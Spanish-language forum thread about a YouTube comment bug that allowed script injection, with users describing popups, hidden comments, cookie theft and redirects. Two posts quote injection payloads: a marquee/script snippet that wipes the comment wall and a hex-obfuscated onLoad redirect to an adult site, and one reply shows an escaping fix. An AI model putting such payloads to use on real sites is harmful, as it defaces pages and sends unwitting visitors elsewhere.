Youtube - Bug muy grave permite incrustar codigo

LzO

Pues por si no os habiais fijado, hay un bug muy grave en youtube, permite incrustar en los comentarios codigo javascript, no voy a publicar el codigo, pero usando google se encuentra.

Videos como estos, ya han sido "explotados"

http://www.youtube.com/watch?v=cMCNawWpK-s

http://www.youtube.com/watch?v=fnsLz-F964o

Y miles de videos más, no pongo más, con 2 ya teneis un simple ejemplo, se puede poner un popup como en el primer video.

Tambien se puede mandar a tomar por culo el "muro" de comentarios borrando dichos comentarios y anulando el envio de nuevos comentarios, añadir marquesinas en comentarios, etc etc etc.

Yo me andaria con ojo al visitar youtube, no vaya a ser que incrusten algun codigo que redireccione a paginas virulentas.

Dod-Evers

Es el código de cierto sitio de imgboards de internet?

helicon

<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>comentario<script>

con éste, desaparecen todos los comentarios menos el tuyo, el cual sale en una marquesina enorme en rojo. y lo de los related videos se va al carajo.

#2 sí xD

duriel_one

En el primer video:

"hola somos unos sudacas de mierda y olemos a chimpancé" wtf? xd

Esto lo va a quitar youtube en 0,

anikex

lo raro esque no lo hayan descubierto antes ellos mismos y lo hayan quitado

helicon

Ahora están subiendo videos de violaciones como si fuesen videos de Bieber, y lo peor de todo es que con los códigos esos no se pueden flagear los videos xDDDDDDDDDDDDDDD

2
NocAB

#6 Pero eso no es de tontos??

Cuando youtube veo esos vídeos además de quitarlos seguramente denunciará a los que los han subido, no? :S

helicon

No lo sé, yo solo advierto que si alguien se dedica a hacer chorradas de estas, que no lo haga con su cuenta xD

PeLoTaSo

Hombre meter código no creo que sea denunciable, al menos en España. Subir videos de violaciones obviamente sí, pero ya hay que ser retrasado xD

helicon

ya, pero que sea legal o no, no quita que por abusar de un bug te puedan quitar la cuenta o vete t u a saber.

1
Nordicmist

Este es bastante gracioso tambien XD.

http://img815.imageshack.us/f/justinbieber.jpg/

J

http://www.youtube.com/watch?v=QZ1x2rcX76Y

spyro512

No hay que ser un genio para conseguir el codigo y ya estoy haciendo el bobo por ahi xD Es divertido.

bloodhound

Diosss que grandes!!

yukiHime

Shit, no encuentro el código, alguien por MP me lo pase T_T

jack_wade

Mucho ojo por que el script ya ha digievolucionado a un robacookies con el que, visitando cierto vídeo, el autor del script puede hacerse con el nombre de usuario y contraseña de tu cuenta.

¿Y a que no adivináis a que imageboard se le ha ocurrido la brillante idea?

Vale, ahora ciertos vídeos también redirigen a pron, bestiality y demás lindezas del internet.

yukiHime

#16 la que están liando xD

jack_wade

CONFIRMED: users of Internet Explorer and Opera CAN have their System32 deleted.

OMG

Kaoticbcn

#16, #18 Me cuesta creer...

C

la estan liando en varios videos

PeLoTaSo

La de denuncias que le van a llover a youtube...

yukiHime

#18 Creo que casi todos usamos Firefox o Google Chrome : /

P.D.: Todos a usar el UltraSurf!

P

Pues yo por si las moscas paso de meterme a youtube hasta que lo solucionen... Que mal rollo. xD

2
L

#19 Como si fuera algo que no se ha hecho nunca xD

Merluza

k es lo que pasa exactamente?

Soldier

Yo sólo he visto algo de porno pero nada de violaciones etc... que decepción xD

YOUTUBE has set safty mode as default. NO MORE SCRIPTS :(

LOc0

Me parece surrealista un bug así en una web de tito Google :O ...

$comentario=htmlentities($comentario);

Salu2 ;)

1
anikex

<script><BODY onLoad="var a = '\x68\x74\x74\x70\x3a\x2f\x2f' + '\x77\x77\x77\x2e' + 'redtube' + '\x2ecom/33254?avID=8&avEnter=1'; location.href = a;"

con eso te redirige a redtube xDDDD

y estan poniendo codigos para ejecutar desde opera y ie la calculadora de windows por ejemplo y borrar ficheros y demas omfg xDD

J

http://www.youtube.com/watch?v=wutmEjdbedE

edit: oh shit, parece que lo quitaron.

FuTuRee

Vale, venía a comentarlo. Lo mejor es estar ahora alejado de youtube más que nada porque el código está evolucionando a algo más que una simple broma.